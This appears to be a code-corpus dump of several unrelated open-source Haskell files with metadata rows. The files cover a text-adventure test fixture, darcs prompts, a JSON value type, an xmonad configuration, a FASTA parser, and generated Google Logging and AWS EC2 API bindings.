| DrNico/rhodium | tools/rhc-strap/Rhodium/Types.hs | mit | 2,276 | 0 | 13 | 706 | 844 | 448 | 396 | 70 | 1 |
module Samples where
import Test.Hspec
import Data.Map (Map, fromList)
import qualified Data.Map as Map
import Places
import Game
import Graph
import DIYGraph
import Dictionary
import Parse
import Player
import Text.ParserCombinators.Parsec.Error(ParseError(..), Message, newErrorMessage, errorMessages, messageEq)
import Text.Parsec.Pos(SourcePos, initialPos)
-- ParseError isn't an instance of Eq
instance Eq ParseError where
a == b = errorMessages a == errorMessages b
sampleFile :: String
sampleFile =
"1. A place\n\
\ description\n\
\-> South (s): 2\n\
\2. A place\n\
\ description\n\
\-> North (n): 1"
sampleDefinitions :: Dictionary
sampleDefinitions = Map.fromList [ ("s", "South"), ("n", "North"), ("south", "South"), ("north", "North") ]
sampleExits :: [Exit]
sampleExits = [ Exit "South" ["s"] 2 ]
samplePlaces :: [ Place ]
samplePlaces = [ Place 1 "A place" "description" [] [] [Exit "South" ["s"] 2] ,
Place 2 "A place" "description" [] [] [Exit "North" ["n"] 1] ]
sampleGraph = ( [("North", 2)], (1, head samplePlaces), [("South", 2)]) :&:
(([("South", 1)], (2, last samplePlaces), [("North", 1)]) :&: EmptyGraph)
sampleMap :: String
sampleMap = "1. A place\n description\n-> South (s): 2\n" ++
"2. A place\n description\n-> North (n): 1"
sampleMap2 :: String
sampleMap2 = "1. A place\n description\n-> South (s): 2\n" ++
"2. A pit\n description\n" ++
"3. A place\n description\n-> North (n): 1, West (w): 2"
samplePlaces2 :: [ Place ]
samplePlaces2 = [ Place 1 "A place" "description" [] [] [Exit "South" ["s"] 2],
Place 2 "A pit" "description" [] [] [],
Place 3 "A place" "description" [] [] [Exit "North" ["n"] 1, Exit "West" ["w"] 2]]
sampleMapExitsGood = "-> South (s): 2"
sampleMap2Defs :: Dictionary
sampleMap2Defs = Map.fromList [ ("s", "South"), ("south", "South"),
("n", "North"), ("north", "North"),
("w", "West"), ("west", "West") ]
sampleMap2Exits = [ Exit "South" ["s"] 2, Exit "North" ["n"] 1,
Exit "West" ["w"] 2]
sampleMapExitsBad :: String
sampleMapExitsBad = "-> South @#4 f(s): 2"
samplePlayer :: Player
samplePlayer = makePlayer sampleGraph
sampleGame :: Game
sampleGame = Game { player = samplePlayer,
mapGraph = sampleGraph,
dictionary = sampleDefinitions }
sampleGameSouth :: Game
sampleGameSouth = Game { player = Player {currentPlace = 2, playerInventory = [], playerInfo = fromList [("Alive","True"),("Won","False"),("description","As lovely as ever."),("score","0")]},
mapGraph = sampleGraph,
dictionary = sampleDefinitions }
| emhoracek/explora | test-suite/Samples.hs | gpl-2.0 | 2,807 | 0 | 11 | 693 | 785 | 465 | 320 | 57 | 1 |
module Darcs.Util.Prompt
(
-- * User prompts
askEnter
, askUser
, askUserListItem
, PromptConfig(..)
, promptYorn
, promptChar
) where
import Prelude hiding ( catch )
import Control.Monad ( void )
import Data.Char ( toUpper, toLower, isSpace )
import System.Console.Haskeline ( runInputT, defaultSettings, getInputLine,
getInputChar, outputStr, outputStrLn )
import Darcs.Util.Progress ( withoutProgress )
-- | Ask the user for a line of input.
askUser :: String -- ^ The prompt to display
-> IO String -- ^ The string the user entered.
askUser prompt = withoutProgress $ runInputT defaultSettings $
getInputLine prompt
>>= maybe (error "askUser: unexpected end of input") return
-- | Ask the user to press Enter
askEnter :: String -- ^ The prompt to display
-> IO ()
askEnter prompt = void $ askUser prompt
-- | @askUserListItem prompt xs@ enumerates @xs@ on the screen, allowing
-- the user to choose one of the items
askUserListItem :: String
-> [String]
-> IO String
askUserListItem prompt xs = withoutProgress $ runInputT defaultSettings $ do
outputStr . unlines $ zipWith (\n x -> show n ++ ". " ++ x) [1::Int ..] xs
loop
where
loop = do
answer <- getInputLine prompt
>>= maybe (error "askUser: unexpected end of input") return
case maybeRead answer of
Just n | n > 0 && n <= length xs -> return (xs !! (n-1))
_ -> outputStrLn "Invalid response, try again!" >> loop
maybeRead :: Read a
=> String
-> Maybe a
maybeRead s = case reads s of
[(x, rest)] | all isSpace rest -> Just x
_ -> Nothing
data PromptConfig = PromptConfig { pPrompt :: String
, pBasicCharacters :: [Char]
, pAdvancedCharacters :: [Char] -- ^ only shown on help
, pDefault :: Maybe Char
, pHelp :: [Char]
}
-- | Prompt the user for a yes or no
promptYorn :: String -> IO Bool
promptYorn p = (== 'y') `fmap` promptChar (PromptConfig p "yn" [] Nothing [])
-- | Prompt the user for a character, among a list of possible ones.
-- Always returns a lowercase character. This is because the default
-- character (ie, the character shown in uppercase, that is automatically
-- selected when the user presses the space bar) is shown as uppercase,
-- hence users may want to enter it as uppercase.
promptChar :: PromptConfig -> IO Char
promptChar (PromptConfig p basic_chs adv_chs md help_chs) =
withoutProgress $ runInputT defaultSettings loopChar
where
chs = basic_chs ++ adv_chs
loopChar = do
let chars = setDefault (basic_chs ++ (if null adv_chs then "" else "..."))
prompt = p ++ " [" ++ chars ++ "]" ++ helpStr
a <- getInputChar prompt >>= maybe (error "promptChar: unexpected end of input") (return . toLower)
case () of
_ | a `elem` chs -> return a
| a == ' ' -> maybe tryAgain return md
| a `elem` help_chs -> return a
| otherwise -> tryAgain
helpStr = case help_chs of
[] -> ""
(h:_) | null adv_chs -> ", or " ++ (h:" for help: ")
| otherwise -> ", or " ++ (h:" for more options: ")
tryAgain = do outputStrLn "Invalid response, try again!"
loopChar
setDefault s = case md of Nothing -> s
Just d -> map (setUpper d) s
setUpper d c = if d == c then toUpper c else c
| DavidAlphaFox/darcs | src/Darcs/Util/Prompt.hs | gpl-2.0 | 3,739 | 0 | 17 | 1,252 | 927 | 484 | 443 | 69 | 5 |
module Value (Environment, Couple, Term, Cons, Symbol, Constraint, Value(Cons, Symbol, Data, Control), Control(Closure, Primitive, Function, Action), Promise(Thunk, Result)) where
import Data
import Promise
import Expression
import Store
import Binding
import JSON
import Data.List
import Text.JSON
type Environment = Address (Binding Value)
type Couple = (Value, Value)
type Cons = Address Couple
-----------
-- Value --
-----------
data Value
= Cons Cons
| Symbol Symbol
| Data Data
| Control Control
deriving Eq
instance JSON Value where
showJSON (Cons addr) = JSObject $ toJSObject [("cons", showJSON addr)]
showJSON (Symbol addr) = JSObject $ toJSObject [("symbol", showJSON addr)]
showJSON (Data dta) = JSObject $ toJSObject [("data", showJSON dta)]
showJSON (Control ctr) = JSObject $ toJSObject [("control", showJSON ctr)]
readJSON (JSObject obj) = case fromJSObject obj
of (("cons", jsv):[]) -> (readJSON jsv) >>= (return . Cons)
(("symbol", jsv):[]) -> (readJSON jsv) >>= (return . Symbol)
(("data", jsv):[]) -> (readJSON jsv) >>= (return . Data)
(("control", jsv):[]) -> (readJSON jsv) >>= (return . Control)
-------------
-- Control --
-------------
data Control
= Closure [String] Expression Environment
| Primitive String
| Function String
| Action String
deriving Eq
instance JSON Control where
showJSON (Closure strs expr env) = JSObject $ toJSObject [("parameters", showJSON strs), ("body", showJSON expr), ("environment", showJSON env)]
showJSON (Primitive str) = showJSON $ str
showJSON (Function str) = showJSON $ str
showJSON (Action str) = showJSON $ str
readJSON (JSString jss) = case fromJSString jss
of name@('?':_) -> Ok $ Function name
name@('!':_) -> Ok $ Action name
name -> Ok $ Primitive name
readJSON (JSObject obj) = let pairs = fromJSObject obj
in do params <- property "parameters" pairs
body <- property "body" pairs
env <- property "environment" pairs
return $ Closure params body env
readJSON jsv = Error $ (show jsv)++" is not a valid control"
| lachrist/kusasa-hs | value.hs | gpl-2.0 | 2,385 | 0 | 11 | 698 | 806 | 441 | 365 | 55 | 0 |
{-# LANGUAGE NoImplicitPrelude #-}
{-# LANGUAGE OverloadedStrings #-}
import ClassyPrelude
import Test.Hspec
import Scrape
import Types
main :: IO ()
main = hspec $
describe "Scrape" $ do
describe "getArticles" $ do
it "produces a non-empty list of articles" $
getArticles `shouldNotReturn` []
it "creates article URLs below bunte.de" $
let shouldBeAtBunte (Article _ url _) = unpack url `shouldStartWith` "http://www.bunte.de/" in
getArticles >>= mapM_ shouldBeAtBunte
describe "getArticleContents" $
it "returns a non empty text" $ do
articles <- getArticles
case articles of
[] -> expectationFailure "No articles available"
(a:_) -> getArticleContents a `shouldNotReturn` ""
| sebastianpoeplau/servant-experiment | test/Spec.hs | gpl-2.0 | 900 | 0 | 18 | 317 | 185 | 90 | 95 | 21 | 2 |
module Main where
import System.Environment (getArgs)
import Data.MyReverse
main = do
args <- getArgs
print $ myReverse args
| AntoineSavage/haskell | cabal_htf_tutorial/src/Main.hs | gpl-2.0 | 129 | 0 | 8 | 22 | 41 | 22 | 19 | 6 | 1 |
-- Author: Viacheslav Lotsmanov
-- License: GPLv3 https://raw.githubusercontent.com/unclechu/xmonadrc/master/LICENSE
{-# OPTIONS_GHC -fno-warn-missing-signatures #-}
{-# LANGUAGE PackageImports #-}
module Config
( myConfig
) where
import "xmonad" XMonad ( (=?), (-->), (<&&>), (<+>), (|||)
, Mirror (Mirror)
, Full (Full)
, ManageHook
, composeAll
, className, title, stringProperty
)
import qualified "xmonad" XMonad as XM
import qualified "xmonad" XMonad.StackSet as W
import "xmonad-contrib" XMonad.Layout.Grid (Grid (Grid))
import "xmonad-contrib" XMonad.Layout.Spiral (spiral)
import "xmonad-contrib" XMonad.Layout.NoBorders (noBorders)
import "xmonad-contrib" XMonad.Layout.SimplestFloat (simplestFloat)
import "xmonad-contrib" XMonad.Layout.PerWorkspace (onWorkspace)
import "xmonad-contrib" XMonad.Layout.Cross (simpleCross)
import "xmonad-contrib" XMonad.Layout.Circle (Circle (Circle))
import "xmonad-contrib" XMonad.Layout.CenteredMaster (centerMaster)
import "xmonad-contrib" XMonad.Layout.ThreeColumns (ThreeCol (ThreeColMid))
import "xmonad-contrib" XMonad.Layout.ResizableTile (ResizableTall (ResizableTall))
import qualified "xmonad-contrib" XMonad.Layout.Tabbed as Tabbed
import "xmonad-contrib" XMonad.Hooks.ManageDocks (manageDocks, avoidStruts, docksEventHook)
import "xmonad-contrib" XMonad.Hooks.ManageHelpers (doCenterFloat)
import "xmonad-contrib" XMonad.Hooks.EwmhDesktops (activateLogHook)
import "xmonad-contrib" XMonad.Hooks.FadeInactive
( fadeInactiveLogHook
, fadeInactiveCurrentWSLogHook
)
import "data-default" Data.Default (def)
-- local imports
import Workspaces (myWorkspaces)
import FocusHook (focusManageHook)
import Utils.CustomConfig (Config ( cfgMetaKey
, cfgTerminal
, cfgBorderWidth
, cfgInactiveWindowOpacity
, cfgInactiveWindowOpacityOnlyForCurrentWs
)
)
myConfig customConfig = def
{ XM.manageHook = manageDocks
<+> focusManageHook
<+> myManageHook
<+> XM.manageHook def
, XM.logHook = activateLogHook focusManageHook
<+> opacityLogHook
<+> XM.logHook def
, XM.layoutHook = myLayoutHook
, XM.handleEventHook = docksEventHook <+> XM.handleEventHook def
, XM.borderWidth = read $ show $ cfgBorderWidth customConfig
, XM.modMask = cfgMetaKey customConfig
, XM.terminal = cfgTerminal customConfig
, XM.workspaces = myWorkspaces
, XM.focusFollowsMouse = False
, XM.clickJustFocuses = True
}
where
myLayoutHook =
onWorkspace (last myWorkspaces) lastLayouts $
onWorkspace (last $ init myWorkspaces) secondaryLayouts $
onWorkspace (myWorkspaces !! 2) secondaryLayouts $
usualLayouts
where
ration = 2/3 -- master proportion
delta = 1/100 -- percent of master resize
tabbedLayout = Tabbed.tabbed Tabbed.shrinkText myTabTheme
mySpiral = spiral (6/7)
rTiled = ResizableTall 1 delta ration []
usualLayouts =
( avoidStruts $ rTiled
||| Mirror rTiled
||| Grid
||| mySpiral
||| simpleCross
||| Circle
||| centerMaster Grid
||| tabbedLayout
||| ThreeColMid 1 delta (1/2)
) ||| simplestFloat
||| noBorders Full
secondaryLayouts =
( avoidStruts $ centerMaster Grid
||| Grid
||| rTiled
||| Mirror rTiled
||| mySpiral
||| simpleCross
||| Circle
||| tabbedLayout
) ||| simplestFloat
||| noBorders Full
lastLayouts =
( avoidStruts $ Grid
||| rTiled
||| Mirror rTiled
||| mySpiral
||| simpleCross
||| Circle
||| centerMaster Grid
||| tabbedLayout
) ||| simplestFloat
||| noBorders Full
opacityLogHook =
let inactiveOpacity = cfgInactiveWindowOpacity customConfig
in if cfgInactiveWindowOpacityOnlyForCurrentWs customConfig
then fadeInactiveCurrentWSLogHook inactiveOpacity
else fadeInactiveLogHook inactiveOpacity
myManageHook :: ManageHook
myManageHook = composeAll $
[ className =? "Gmrun" --> doCenterFloat
, title =? "gpaste-zenity" --> doCenterFloat
, className =? "Gpaste-gui.pl" --> doCenterFloat
, className =? "Gnome-calculator" --> doCenterFloat
-- GIMP
, wmRole =? "gimp-toolbox-color-dialog" --> doCenterFloat
, wmRole =? "gimp-message-dialog" --> doCenterFloat
, wmRole =? "gimp-layer-new" --> doCenterFloat
, wmRole =? "gimp-image-new" --> doCenterFloat
, className =? "qjackctl" --> doCenterFloat
, className =? "Audacious" --> moveTo (last $
init myWorkspaces)
, className =? "Doublecmd"
<&&> fmap not (nameContains "Double Commander ")
--> doCenterFloat
-- Force child windows of Ardour to be float
, ardourChildWindow --> doCenterFloat
-- Move messangers to last workspace
, className =? "Gajim" --> moveTo lastWs
, className =? "Hexchat" --> moveTo lastWs
, className =? "utox" --> moveTo lastWs
, className =? "qTox" --> moveTo lastWs
, className =? "Gnome-ring" --> moveTo lastWs
, className =? "Riot" --> moveTo lastWs
, className =? "Rambox" --> moveTo lastWs
, className =? "Thunderbird" --> moveTo lastWs
]
++
-- Audacious
[ className =? "Audacious" <&&> title =? x --> doCenterFloat
| x <- [ "Song Info"
, "Audacious Settings"
, "JACK Output Settings"
, "Add Files"
, "Open Files"
]
]
where wmRole = stringProperty "WM_WINDOW_ROLE"
wmName = stringProperty "WM_NAME"
moveTo = XM.doF . W.shift
lastWs = last myWorkspaces
ardourChildWindow = fmap m className
where m :: String -> Bool
m ('A':'r':'d':'o':'u':'r':'-':'5':'.':_) = True
m _ = False
nameContains :: String -> XM.Query Bool
nameContains namePart = fmap f wmName
where f :: String -> Bool
f x | x == "" = False
| part x == namePart = True
| otherwise = f $ tail x
len = length namePart :: Int
part = take len :: String -> String
myTabTheme :: Tabbed.Theme
myTabTheme = def
{ Tabbed.activeColor = "#3c5863"
, Tabbed.activeBorderColor = "#000000"
, Tabbed.inactiveColor = "#666666"
, Tabbed.inactiveBorderColor = "#000000"
, Tabbed.activeTextColor = "lightgray"
, Tabbed.inactiveTextColor = "#aaa"
, Tabbed.decoHeight = 12
, Tabbed.fontName = "terminus"
}
| unclechu/xmonadrc | xmonad/src/Config.hs | gpl-3.0 | 7,977 | 0 | 20 | 3,029 | 1,479 | 834 | 645 | 160 | 2 |
{-# LANGUAGE DeriveFunctor #-}
{-# LANGUAGE TemplateHaskell #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE MultiParamTypeClasses #-}
module Geometry.Hyperplane
( Hyperplane(..)
, planeNormal, planeValue
, planeDist
, movePlane
) where
import Linear
import Linear.Affine
import Control.Lens hiding (transform)
import Constraints.Vector
import Transformation
-- A hyperplane (or half space) of a vector space.
data Hyperplane v a = Hyperplane
{ _planeNormal :: v a
, _planeValue :: a
}
deriving (Show, Functor)
makeLenses ''Hyperplane
-- Positive values mean 'in front of the plane'
-- (or 'outside the half space'),
-- negative values mean 'behind the plane'
-- (or 'in the half space').
planeDist :: (Metric v, Num a) => Hyperplane v a -> Point v a -> a
planeDist (Hyperplane n v) (P p) = n `dot` p - v
instance (SomeVector v) => Transformable v (Hyperplane v) where
transform t (Hyperplane n v) =
let n' = transform t n
v' = v + (translationPart t `dot` n')
in Hyperplane n' v'
movePlane :: (Num a) => a -> Hyperplane v a -> Hyperplane v a
movePlane d = planeValue %~ (+d)
| MatthiasHu/4d-labyrinth | src/Geometry/Hyperplane.hs | gpl-3.0 | 1,124 | 0 | 13 | 226 | 313 | 174 | 139 | 28 | 1 |
import System.Serverman.Utils
import Test.QuickCheck
| mdibaiee/serverman | test/Utils.hs | gpl-3.0 | 55 | 0 | 4 | 6 | 12 | 7 | 5 | 2 | 0 |
-- Parse module.
-- By G.W. Schwartz
--
{- | Collection of functions for the parsing of a fasta file. Uses the Text
type.
-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE BangPatterns #-}
module Data.Fasta.Text.Parse ( parsecFasta
, parsecCLIPFasta
, attoFasta
, attoCLIPFasta
, pipesFasta
, pipesCLIPFasta
, removeNs
, removeN
, removeCLIPNs ) where
-- Built-in
import Data.Char
import Text.Parsec
import Text.Parsec.Text
import qualified Data.Map.Strict as Map
import qualified Data.Text as T
import qualified Control.Applicative as CA
import Control.Monad (void)
-- Cabal
import qualified Data.Attoparsec.Text as A
import Pipes
import qualified Pipes.Prelude as P
import qualified Pipes.Text as PT
import qualified Pipes.Group as PG
import qualified Pipes.Attoparsec as PA
import Control.Lens (view)
import qualified Control.Foldl as FL
-- Local
import Data.Fasta.Text.Types
eol :: Parsec T.Text u String
eol = choice . map (try . string) $ ["\n\r", "\r\n", "\n", "\r"]
eoe :: Parsec T.Text u ()
eoe = lookAhead (void $ char '>') <|> eof
fasta :: Parsec T.Text u FastaSequence
fasta = do
spaces
char '>'
header <- manyTill (satisfy (/= '>')) eol
fseq <- manyTill anyChar eoe
return (FastaSequence { fastaHeader = T.pack header
, fastaSeq = T.pack . removeWhitespace $ fseq } )
where
removeWhitespace = filter (`notElem` ("\n\r " :: String))
fastaFile :: Parsec T.Text u [FastaSequence]
fastaFile = do
spaces
many fasta
fastaCLIP :: Parsec T.Text u (FastaSequence, [FastaSequence])
fastaCLIP = do
spaces
char '>'
germline <- fasta
clones <- many $ try fasta
return (germline, clones)
fastaCLIPFile :: Parsec T.Text u [(FastaSequence, [FastaSequence])]
fastaCLIPFile = do
spaces
many fastaCLIP
-- | Parse a standard fasta file
parsecFasta :: T.Text -> [FastaSequence]
parsecFasta = eToV . parse fastaFile "error"
where
eToV (Right x) = x
eToV (Left x) = error ("Unable to parse fasta file\n" ++ show x)
-- | Parse a CLIP fasta file
parsecCLIPFasta :: T.Text -> CloneMap
parsecCLIPFasta = Map.fromList
. map (\(!x, (!y, !z)) -> ((x, y), z))
. zip [0..]
. eToV
. parse fastaCLIPFile "error"
where
eToV (Right x) = x
eToV (Left x) = error ("Unable to parse fasta file\n" ++ show x)
-- | attopares any char but space
anyButSpace :: A.Parser Char
anyButSpace = do
A.skipSpace
x <- A.anyChar
A.skipSpace
return x
-- | attoparsec parser for a fasta type
fasta' :: A.Parser FastaSequence
fasta' = do
header <- A.takeWhile (not . A.isEndOfLine)
A.endOfLine
fseq <- A.manyTill anyButSpace (void (A.char '>') CA.<|> A.endOfInput)
return FastaSequence { fastaHeader = header
, fastaSeq = T.pack fseq }
-- | attoparsec parser for a fasta file
fastaFile' :: A.Parser [FastaSequence]
fastaFile' = do
A.skipSpace
A.char '>'
A.many' fasta'
-- | attoparsec parser for a CLIP fasta sequence
fastaCLIP' :: A.Parser FastaSequence
fastaCLIP' = do
header <- A.takeWhile (not . A.isEndOfLine)
A.endOfLine
fseq <- A.manyTill anyButSpace (void (A.char '>') CA.<|> A.endOfInput)
return FastaSequence { fastaHeader = header
, fastaSeq = T.pack fseq }
clone' :: A.Parser (Germline, [FastaSequence])
clone' = do
A.skipSpace
germline <- fastaCLIP'
fseqs <- A.manyTill fasta' (void (A.char '>') CA.<|> A.endOfInput)
return (germline, fseqs)
-- | attoparsec parser for a fasta file
fastaCLIPFile' :: A.Parser [(Germline, [FastaSequence])]
fastaCLIPFile' = do
A.skipSpace
A.string ">>"
A.many' clone'
-- | Parse a standard fasta file
attoFasta :: T.Text -> [FastaSequence]
attoFasta = eToV . A.parseOnly fastaFile'
where
eToV (Right x) = x
eToV (Left x) = error ("Unable to parse fasta file\n" ++ show x)
-- | Parse a CLIP fasta file
attoCLIPFasta :: T.Text -> [(Germline, [FastaSequence])]
attoCLIPFasta = eToV . A.parseOnly fastaCLIPFile'
where
eToV (Right x) = x
eToV (Left x) = error ("Unable to parse fasta file\n" ++ show x)
-- | Parse a standard fasta file into a pipe
pipesFasta :: (MonadIO m) => Producer T.Text m () -> Producer FastaSequence m ()
pipesFasta p = FL.purely PG.folds FL.mconcat ( view (PT.splits '>')
. PT.drop (1 :: Int)
$ p )
>-> P.map toFasta
where
toFasta x = FastaSequence { fastaHeader = head . lines' $ x
, fastaSeq = T.concat . tail . lines' $ x }
lines' = T.lines . T.filter (/= '\r')
-- | Parse a CLIP fasta file into a pipe
pipesCLIPFasta :: (MonadIO m)
=> Producer T.Text m ()
-> Producer (Germline, [FastaSequence]) m (Either (PA.ParsingError, Producer T.Text m ()) ())
pipesCLIPFasta = PA.parsed clone' . PT.drop 2 . (>-> PT.stripStart)
-- | Remove Ns from a collection of sequences
removeNs :: [FastaSequence] -> [FastaSequence]
removeNs = map (\x -> x { fastaSeq = noN . fastaSeq $ x })
where
noN = T.map (\y -> if y /= 'N' && y /= 'n' then y else '-')
-- | Remove Ns from a sequence
removeN :: FastaSequence -> FastaSequence
removeN x = x { fastaSeq = noN . fastaSeq $ x }
where
noN = T.map (\y -> if y /= 'N' && y /= 'n' then y else '-')
-- | Remove Ns from a collection of CLIP fasta sequences
removeCLIPNs :: CloneMap -> CloneMap
removeCLIPNs = Map.fromList . map remove . Map.toList
where
remove ((!x, !y), !z) = ((x, newSeq y), map newSeq z)
newSeq !x = x { fastaSeq = noN . fastaSeq $ x }
noN = T.map (\y -> if y /= 'N' && y /= 'n' then y else '-')
| GregorySchwartz/fasta | src/Data/Fasta/Text/Parse.hs | gpl-3.0 | 5,965 | 0 | 14 | 1,667 | 1,860 | 996 | 864 | 134 | 2 |
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE DeriveDataTypeable #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE NoImplicitPrelude #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TypeFamilies #-}
{-# LANGUAGE TypeOperators #-}
{-# OPTIONS_GHC -fno-warn-duplicate-exports #-}
{-# OPTIONS_GHC -fno-warn-unused-binds #-}
{-# OPTIONS_GHC -fno-warn-unused-imports #-}
-- |
-- Module : Network.Google.Resource.Logging.Organizations.Locations.Buckets.Views.Get
-- Copyright : (c) 2015-2016 Brendan Hay
-- License : Mozilla Public License, v. 2.0.
-- Maintainer : Brendan Hay <brendan.g.hay@gmail.com>
-- Stability : auto-generated
-- Portability : non-portable (GHC extensions)
--
-- Gets a view.
--
-- /See:/ <https://cloud.google.com/logging/docs/ Cloud Logging API Reference> for @logging.organizations.locations.buckets.views.get@.
module Network.Google.Resource.Logging.Organizations.Locations.Buckets.Views.Get
(
-- * REST Resource
OrganizationsLocationsBucketsViewsGetResource
-- * Creating a Request
, organizationsLocationsBucketsViewsGet
, OrganizationsLocationsBucketsViewsGet
-- * Request Lenses
, olbvgXgafv
, olbvgUploadProtocol
, olbvgAccessToken
, olbvgUploadType
, olbvgName
, olbvgCallback
) where
import Network.Google.Logging.Types
import Network.Google.Prelude
-- | A resource alias for @logging.organizations.locations.buckets.views.get@ method which the
-- 'OrganizationsLocationsBucketsViewsGet' request conforms to.
type OrganizationsLocationsBucketsViewsGetResource =
"v2" :>
Capture "name" Text :>
QueryParam "$.xgafv" Xgafv :>
QueryParam "upload_protocol" Text :>
QueryParam "access_token" Text :>
QueryParam "uploadType" Text :>
QueryParam "callback" Text :>
QueryParam "alt" AltJSON :> Get '[JSON] LogView
-- | Gets a view.
--
-- /See:/ 'organizationsLocationsBucketsViewsGet' smart constructor.
data OrganizationsLocationsBucketsViewsGet =
OrganizationsLocationsBucketsViewsGet'
{ _olbvgXgafv :: !(Maybe Xgafv)
, _olbvgUploadProtocol :: !(Maybe Text)
, _olbvgAccessToken :: !(Maybe Text)
, _olbvgUploadType :: !(Maybe Text)
, _olbvgName :: !Text
, _olbvgCallback :: !(Maybe Text)
}
deriving (Eq, Show, Data, Typeable, Generic)
-- | Creates a value of 'OrganizationsLocationsBucketsViewsGet' with the minimum fields required to make a request.
--
-- Use one of the following lenses to modify other fields as desired:
--
-- * 'olbvgXgafv'
--
-- * 'olbvgUploadProtocol'
--
-- * 'olbvgAccessToken'
--
-- * 'olbvgUploadType'
--
-- * 'olbvgName'
--
-- * 'olbvgCallback'
organizationsLocationsBucketsViewsGet
:: Text -- ^ 'olbvgName'
-> OrganizationsLocationsBucketsViewsGet
organizationsLocationsBucketsViewsGet pOlbvgName_ =
OrganizationsLocationsBucketsViewsGet'
{ _olbvgXgafv = Nothing
, _olbvgUploadProtocol = Nothing
, _olbvgAccessToken = Nothing
, _olbvgUploadType = Nothing
, _olbvgName = pOlbvgName_
, _olbvgCallback = Nothing
}
-- | V1 error format.
olbvgXgafv :: Lens' OrganizationsLocationsBucketsViewsGet (Maybe Xgafv)
olbvgXgafv
= lens _olbvgXgafv (\ s a -> s{_olbvgXgafv = a})
-- | Upload protocol for media (e.g. \"raw\", \"multipart\").
olbvgUploadProtocol :: Lens' OrganizationsLocationsBucketsViewsGet (Maybe Text)
olbvgUploadProtocol
= lens _olbvgUploadProtocol
(\ s a -> s{_olbvgUploadProtocol = a})
-- | OAuth access token.
olbvgAccessToken :: Lens' OrganizationsLocationsBucketsViewsGet (Maybe Text)
olbvgAccessToken
= lens _olbvgAccessToken
(\ s a -> s{_olbvgAccessToken = a})
-- | Legacy upload protocol for media (e.g. \"media\", \"multipart\").
olbvgUploadType :: Lens' OrganizationsLocationsBucketsViewsGet (Maybe Text)
olbvgUploadType
= lens _olbvgUploadType
(\ s a -> s{_olbvgUploadType = a})
-- | Required. The resource name of the policy:
-- \"projects\/[PROJECT_ID]\/locations\/[LOCATION_ID]\/buckets\/[BUCKET_ID]\/views\/[VIEW_ID]\"
-- Example:
-- \"projects\/my-project-id\/locations\/my-location\/buckets\/my-bucket-id\/views\/my-view-id\".
olbvgName :: Lens' OrganizationsLocationsBucketsViewsGet Text
olbvgName
= lens _olbvgName (\ s a -> s{_olbvgName = a})
-- | JSONP
olbvgCallback :: Lens' OrganizationsLocationsBucketsViewsGet (Maybe Text)
olbvgCallback
= lens _olbvgCallback
(\ s a -> s{_olbvgCallback = a})
instance GoogleRequest
OrganizationsLocationsBucketsViewsGet
where
type Rs OrganizationsLocationsBucketsViewsGet =
LogView
type Scopes OrganizationsLocationsBucketsViewsGet =
'["https://www.googleapis.com/auth/cloud-platform",
"https://www.googleapis.com/auth/cloud-platform.read-only",
"https://www.googleapis.com/auth/logging.admin",
"https://www.googleapis.com/auth/logging.read"]
requestClient
OrganizationsLocationsBucketsViewsGet'{..}
= go _olbvgName _olbvgXgafv _olbvgUploadProtocol
_olbvgAccessToken
_olbvgUploadType
_olbvgCallback
(Just AltJSON)
loggingService
where go
= buildClient
(Proxy ::
Proxy OrganizationsLocationsBucketsViewsGetResource)
mempty
| brendanhay/gogol | gogol-logging/gen/Network/Google/Resource/Logging/Organizations/Locations/Buckets/Views/Get.hs | mpl-2.0 | 5,528 | 0 | 15 | 1,151 | 709 | 417 | 292 | 110 | 1 |
{-# LANGUAGE DataKinds #-}
{-# LANGUAGE DeriveGeneric #-}
{-# LANGUAGE FlexibleInstances #-}
{-# LANGUAGE GeneralizedNewtypeDeriving #-}
{-# LANGUAGE LambdaCase #-}
{-# LANGUAGE NoImplicitPrelude #-}
{-# LANGUAGE OverloadedStrings #-}
{-# LANGUAGE RecordWildCards #-}
{-# LANGUAGE TypeFamilies #-}
{-# OPTIONS_GHC -fno-warn-unused-imports #-}
-- Module : Network.AWS.EC2.DescribeExportTasks
-- Copyright : (c) 2013-2014 Brendan Hay <brendan.g.hay@gmail.com>
-- License : This Source Code Form is subject to the terms of
-- the Mozilla Public License, v. 2.0.
-- A copy of the MPL can be found in the LICENSE file or
-- you can obtain it at http://mozilla.org/MPL/2.0/.
-- Maintainer : Brendan Hay <brendan.g.hay@gmail.com>
-- Stability : experimental
-- Portability : non-portable (GHC extensions)
--
-- Derived from AWS service descriptions, licensed under Apache 2.0.
-- | Describes one or more of your export tasks.
--
-- <http://docs.aws.amazon.com/AWSEC2/latest/APIReference/ApiReference-query-DescribeExportTasks.html>
module Network.AWS.EC2.DescribeExportTasks
(
-- * Request
DescribeExportTasks
-- ** Request constructor
, describeExportTasks
-- ** Request lenses
, detExportTaskIds
-- * Response
, DescribeExportTasksResponse
-- ** Response constructor
, describeExportTasksResponse
-- ** Response lenses
, detrExportTasks
) where
import Network.AWS.Prelude
import Network.AWS.Request.Query
import Network.AWS.EC2.Types
import qualified GHC.Exts
newtype DescribeExportTasks = DescribeExportTasks
{ _detExportTaskIds :: List "ExportTaskId" Text
} deriving (Eq, Ord, Read, Show, Monoid, Semigroup)
-- | 'DescribeExportTasks' constructor.
--
-- The fields accessible through corresponding lenses are:
--
-- * 'detExportTaskIds' @::@ ['Text']
--
describeExportTasks :: DescribeExportTasks
describeExportTasks = DescribeExportTasks
{ _detExportTaskIds = mempty
}
-- | One or more export task IDs.
detExportTaskIds :: Lens' DescribeExportTasks [Text]
detExportTaskIds = lens _detExportTaskIds (\s a -> s { _detExportTaskIds = a }) . _List
newtype DescribeExportTasksResponse = DescribeExportTasksResponse
{ _detrExportTasks :: List "item" ExportTask
} deriving (Eq, Read, Show, Monoid, Semigroup)
-- | 'DescribeExportTasksResponse' constructor.
--
-- The fields accessible through corresponding lenses are:
--
-- * 'detrExportTasks' @::@ ['ExportTask']
--
describeExportTasksResponse :: DescribeExportTasksResponse
describeExportTasksResponse = DescribeExportTasksResponse
{ _detrExportTasks = mempty
}
-- | Information about the export tasks.
detrExportTasks :: Lens' DescribeExportTasksResponse [ExportTask]
detrExportTasks = lens _detrExportTasks (\s a -> s { _detrExportTasks = a }) . _List
